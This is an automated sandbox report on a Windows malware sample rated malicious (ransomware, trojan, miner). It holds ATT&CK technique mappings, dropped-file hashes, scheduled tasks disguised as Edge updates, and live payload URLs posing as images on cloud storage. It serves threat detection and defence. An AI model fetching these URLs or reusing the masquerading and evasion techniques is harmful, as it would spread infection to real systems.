                Source: C:\Users\user\Documents\l0tiFM.exe Code function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,6_2_00000001400042B0
                Source: C:\Users\user\Documents\l0tiFM.exe Code function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 14 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 Credential API Hooking | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 113 Command and Scripting Interpreter | 43 Windows Service | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 11 Scheduled Task/Job | 11 Scheduled Task/Job | 1 Access Token Manipulation | 1 Abuse Elevation Control Mechanism | Security Account Manager | 1 System Service Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 12 Service Execution | 1 Registry Run Keys / Startup Folder | 43 Windows Service | 41 Obfuscated Files or Information | NTDS | 5 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 111 Software Packing | LSA Secrets | 224 System Information Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 11 Scheduled Task/Job | 1 DLL Side-Loading | Cached Domain Credentials | 341 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 32 Masquerading | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

                [Behavior graph: ID 1588710; Sample: 2976587-987347589.07.exe; Startdate: 11/01/2025; Architecture: WINDOWS; Score: 100]

                Source | Detection | Scanner | Label | Link
                --- | --- | --- | --- | ---
                2976587-987347589.07.exe | 5% | ReversingLabs | |
                2976587-987347589.07.exe | 15% | Virustotal | | Browse

                Source | Detection | Scanner | Label | Link
                --- | --- | --- | --- | ---
                C:\ProgramData\53jGFr5v.exe | 100% | Avira | HEUR/AGEN.1315326 |
                C:\ProgramData\atBs3ba9\d0oKoK2T.exe | 100% | Avira | HEUR/AGEN.1314683 |
                C:\Program Files (x86)\DfP1K3\tbcore3U.dll | 100% | Avira | TR/Redcap.vdzex |
                C:\Program Files (x86)\3q7mMte5\tbcore3U.dll | 100% | Avira | TR/Redcap.vdzex |
                C:\ProgramData\53jGFr5v.exe | 100% | Joe Sandbox ML | |
                C:\ProgramData\atBs3ba9\d0oKoK2T.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\DfP1K3\tbcore3U.dll | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\3q7mMte5\tbcore3U.dll | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe | 0% | ReversingLabs | |
                C:\Program Files (x86)\DfP1K3\DfP1K3.exe | 0% | ReversingLabs | |
                C:\Users\Public\Music\destopbak.ini | 0% | ReversingLabs | |
                C:\Users\user\Documents\l0tiFM.exe | 0% | ReversingLabs | |

                No Antivirus matches
                No Antivirus matches

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                --- | --- | --- | --- | --- | ---
                sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 118.178.60.9 | true | false | | high
                sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 118.178.60.103 | true | false | | high
                sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | 39.103.20.105 | true | false | | unknown
                gqsqoq.net | unknown | unknown | false | | unknown
                upitem.oss-cn-hangzhou.aliyuncs.com | unknown | unknown | false | | unknown
                662hfg.oss-cn-beijing.aliyuncs.com | unknown | unknown | false | | unknown
                22mm.oss-cn-hangzhou.aliyuncs.com | unknown | unknown | false | | high
                              NameMaliciousAntivirus DetectionReputation
                              https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
                                high
                                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                                  high
                                  https://662hfg.oss-cn-beijing.aliyuncs.com/a.giffalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                                    high
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | ASN | ASN Name | Malicious
8.210.66.183 | unknown | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
39.103.20.105 | sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
118.178.60.9 | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
38.45.124.13 | unknown | United States | 174 | COGENT-174US | false
118.178.60.103 | sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588710
Start date and time: 2025-01-11 04:40:30 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 53
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2976587-987347589.07.exe
Detection: MAL
Classification: mal100.rans.troj.evad.mine.winEXE@68/43@16/5
                                                                EGA Information:
                                                                • Successful, ratio: 80%
                                                                HCA Information:
                                                                • Successful, ratio: 77%
                                                                • Number of executed functions: 132
                                                                • Number of non-executed functions: 248
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:42:36 | Task Scheduler | Run new task: 7Pmyv path: C:\Users\user\Documents\l0tiFM.exe
04:43:26 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 3LjWm path: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
04:43:26 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 mKDGY path: C:\Program Files (x86)\DfP1K3\DfP1K3.exe
04:43:51 | Task Scheduler | Run new task: Achieve Plan productivity path: 53jGFr5v.exe
04:44:00 | Task Scheduler | Run new task: Business Your Management Goals Elevate path: lBoqoqIC.exe
04:44:04 | Task Scheduler | Run new task: Intuitive Business Powerful Smooth path: d0oKoK2T.exe s>1776
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                          • 8.148.6.140
                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                                                                          • 39.103.20.105
                                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                                          • 139.240.73.120
                                                                                          4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 42.120.233.253
                                                                                          AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.136.96.106
                                                                                          frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                                                          • 47.110.90.76
                                                                                          3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                                          • 8.136.96.106
                                                                                          beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                          beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 8.148.6.140
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):54152
                                                                                                              Entropy (8bit):6.64786972992462
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                                                              MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                                                              SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                                                              SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                               • Filename: 2873466535874-68348745.02.exe, Detection: malicious
                                                                                                               • Filename: 2362476847-83854387.07.exe, Detection: malicious
                                                                                                               • Filename: 2o63254452-763487230.06.exe, Detection: malicious
                                                                                                               • Filename: e2664726330-76546233.05.exe, Detection: malicious
                                                                                                               • Filename: 23567791246-764698008.02.exe, Detection: malicious
                                                                                                               • Filename: 287438657364-7643738421.08.exe, Detection: malicious
                                                                                                               • Filename: 2749837485743-7684385786.05.exe, Detection: malicious
                                                                                                               • Filename: 2749837485743-7684385786.05.exe, Detection: malicious
                                                                                                               • Filename: 2b687482300.6345827638.08.exe, Detection: malicious
                                                                                                               • Filename: 45631.exe, Detection: malicious
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5059989
                                                                                                              Entropy (8bit):7.99995522609802
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:QOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Ho6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                                              MD5:31B194DB4256124F96EDD75AF3A98DD1
                                                                                                              SHA1:2651275B5E020A42C1DB34760DD5B176570C4ED4
                                                                                                              SHA-256:CF817C25658BAD80B3E2EA1A389DB2BFB3C9716B540152EDFDE4A798180DDC0B
                                                                                                              SHA-512:3B7A32DB90068B01DFF2A243C726B99A588D13D289D9B122FC45F614EEDAF91E5134EC24B838CB57094DA92E874E6288234851A50B69392800EAA70ABF94D055
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4858192
                                                                                                              Entropy (8bit):7.9925166029554005
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/4:9S4+O6P5OeMRrjRy7aPZbm3k8V/4
                                                                                                              MD5:2E2ADE7ED30161A2C6F44FF0CB066FBB
                                                                                                              SHA1:9D36BF07A2B42353F3D8B62C56C9B7CFF04F6E71
                                                                                                              SHA-256:4C7B1FDFCED22A7006F9A835A6A1883A0C7D84C8FBC0A887C76C7C795B2E2B3B
                                                                                                              SHA-512:8EE548365656304EB157D615C6BF98D84225D020ED79E69564B5783C85D8AE75BE5CB8AF4E4EFEC826A95985F8F8A604B5F431DCC76845EAE9DCBC597DE667F4
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):365477
                                                                                                              Entropy (8bit):7.9993996701251575
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:hiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:w8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                                              MD5:A40AD6F7BC0E50B67F3BAEAD143E45E0
                                                                                                              SHA1:AD441A6BE3C719D68AE4AE0B561BA8CE05DDE516
                                                                                                              SHA-256:32F58FCFFFCF43704B18993407D27ABD0ECE0EE5B6D4616E66EBEC3A85C221A8
                                                                                                              SHA-512:6CCCED75782910D9B14CD911CC2935A182F1C1F559EFCD7E7E115AC89D70EA36D8DDBC926001E299C14ABFE1E67F997A3509C7537987933F20A8A30118FBDE09
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):54152
                                                                                                              Entropy (8bit):6.64786972992462
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                                                              MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                                                              SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                                                              SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5059989
                                                                                                              Entropy (8bit):7.999955225187653
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:eOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:xo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                                              MD5:02531E51E43995AAED8CC9CCC9E39233
                                                                                                              SHA1:5D3A0971F315DDB5E1393EC1C6118F5D2B9ECEA7
                                                                                                              SHA-256:0EEAADC24C5991E5F0652AEF3F2845EF96F54E5F04A7803D5BE6F0B1CDA831C0
                                                                                                              SHA-512:4C3633F0CAFCDEC62A6D06F41C344BCFD07085D832C04F912978630A1028DDF247ACA43F2AD757B3509B507F6640CB2B9EB99FA690D35BAC221B6716580AFFFB
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4858192
                                                                                                              Entropy (8bit):7.992517213149572
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/7:9S4+O6P5OeMRrjRy7aPZbm3k8V/7
                                                                                                              MD5:E6E83A72B6FF196944C2BA3016546F53
                                                                                                              SHA1:1A4C3DDE24F4E1F1D0CB327059884B845866D7F5
                                                                                                              SHA-256:F95C0DBC130D1697917DC795FA41A9656B7FBBAEEC28828089A8AA3EBCE8B258
                                                                                                              SHA-512:E843A51CCD825A534745FD3DE5A9DC2FAA29CF285EE9E5C95422B8A7336929A8BEEC19F23CF4586AA852008A22BDCA77C0961C776845D8DB4289D6D4701C90B5
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):365477
                                                                                                              Entropy (8bit):7.9993995649648095
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:siACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:L8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                                              MD5:CE1E5F10EEB9610DD08546FF9BEA6F22
                                                                                                              SHA1:A082C9454ACDEA0AF75276898F68313D1DA4BABE
                                                                                                              SHA-256:061150D1430B72AE934BB7249C9AB31C517EB96187C194121A4ABCF5610F49E0
                                                                                                              SHA-512:7071AC5DBD15351C760CDC103ACCE62AFC3D760B64298B41BFEE74F4726CC6A4B943022D4346D01D4FB38A9BCC41D5F29CDA7563495EF6A005E1AF081D605483
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1589760
                                                                                                              Entropy (8bit):7.902586029461615
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:dpdlghXgOVb8xtjkAz9U0XYRd0zb78N9hQsLXc:BlghHBAZgH0UhPc
                                                                                                              MD5:C12239FE6BC555339AA48D933FC376D2
                                                                                                              SHA1:6E569083D307281321696A487707974D5CE34075
                                                                                                              SHA-256:7416FDF7E5226BDE0ECFD90CA7E758EBBCE8A68192E855514B5C054001A4B6A7
                                                                                                              SHA-512:A6E55A300945299A550141CE340FCC3AC3E11943472877405CCD43496465AB08D17C858D0C9E92FBB5A30014F4E56946DA81A0D71599E08274141C8AA91AE70C
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):670720
                                                                                                              Entropy (8bit):7.90355961235764
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:SKg71yAoHNWR8bTH7MrcuWE/wove/j24yu/ATnZuPESLnV+pFk:1HNJDMor12mquPZjqC
                                                                                                              MD5:147936E67DBDD86961409FE7D5821DA6
                                                                                                              SHA1:C0DEB4CACF0077AA70F8B9146AFE6A4A42C3B26E
                                                                                                              SHA-256:02C61B40E05812E032242DBE59B832F07E7120906425EDE503FC1BE5AA72CC6E
                                                                                                              SHA-512:2A88480EEA1A3EE9A9C6136F552ADE888C599E54E40E9C97F939CAEE55F2F168982AC5D35FF1F3F0DD62950A45035EEC48CAF38468E21B3023C2282A3C07BB1A
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                              Category:dropped
                                                                                                              Size (bytes):57472
                                                                                                              Entropy (8bit):7.9948826495944445
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:LA5UOqaSzVJk7yHWGLvQL2NjQhzehEZSVsKJYN:LsUL1PSkbvG2pkze2GYN
                                                                                                              MD5:D82D5050F2ED81F8EE1EDD16A3FAF73F
                                                                                                              SHA1:AFF90BE2D07BD7D0FE9FBA2F92D8DFC99A15AEAC
                                                                                                              SHA-256:D751E419E2E6792167BBA7748865793B8C15F9DA3E1C85AB0E318016B608BFBA
                                                                                                              SHA-512:D258071D914DFDB8E8E1EFA03E33C4C0D4D304869C23145E24ED53D133C4211BA9218066ED287AC4A869740D3CA06D8CAC03F8BC535740884652D62951F00D09
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                              Category:modified
                                                                                                              Size (bytes):486832
                                                                                                              Entropy (8bit):7.8618165097114545
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:gNrhTLpMP+R+QDCfA832AtBYmz6af0F7Z1QVjSOsJ/K:gthTiP+ffCfB5Lf0F7Z1EDsVK
                                                                                                              MD5:AA990DC3875790615E8CB024A78E9F9C
                                                                                                              SHA1:F8F9E17C7643FB1868B12D69F2BEDA2270D2BC88
                                                                                                              SHA-256:05F43E4848094F76922C7FF36FE99D62C9411022D2646E56427FE6F5DF8FB6D8
                                                                                                              SHA-512:D9AA0AF0C8FDDDCA0F5626C7F9EB0DC54280C92D5FBB45ABC5575799E1824ADC3EDEF30E19F0AA34CFE8CD0AF7AE4DDB13E06EF7F1FBFD118DF44E312E6D2223
                                                                                                              Malicious:true
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 4026 x 4026, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):357440
                                                                                                              Entropy (8bit):7.999367116121707
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:mlMS00uPU0ovLFZL/hwQBXx/xO0JJu53+vn80QOzT:m6S00uPexZL/hZZx/xJoutQu
                                                                                                              MD5:45D868E26A3F4C44D799A1667DC12337
                                                                                                              SHA1:8D8ADE3168CA5094F3DFFA4CF31C7252421001F8
                                                                                                              SHA-256:8DE5B9B45C25D726AEC9CEACF1AE9BEBFB362F1883D8B05BF45B2ABA5615FC72
                                                                                                              SHA-512:49A8C8BACA897240AB7DBAE28A364D7F8F6E1B82423FF18B17CAED3DAC3829505E1ACF81A5F61B55434D2C72FDCB11A517278D33C506090FDFCBB48323F62367
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:MIPSEB MIPS-III ECOFF executable
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:s:s
                                                                                                              MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                                                                              SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                                                                              SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                                                                              SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:.@
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4859125
                                                                                                              Entropy (8bit):7.999956261017207
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                                                              MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                                                              SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                                                              SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                                                              SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                                                              Malicious:true
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8299
                                                                                                              Entropy (8bit):7.9354275320361545
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                                                                              MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                                                                              SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                                                                              SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                                                                              SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\Documents\l0tiFM.exe
                                                                                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5062442
                                                                                                              Entropy (8bit):7.999518892518095
                                                                                                              Encrypted:true
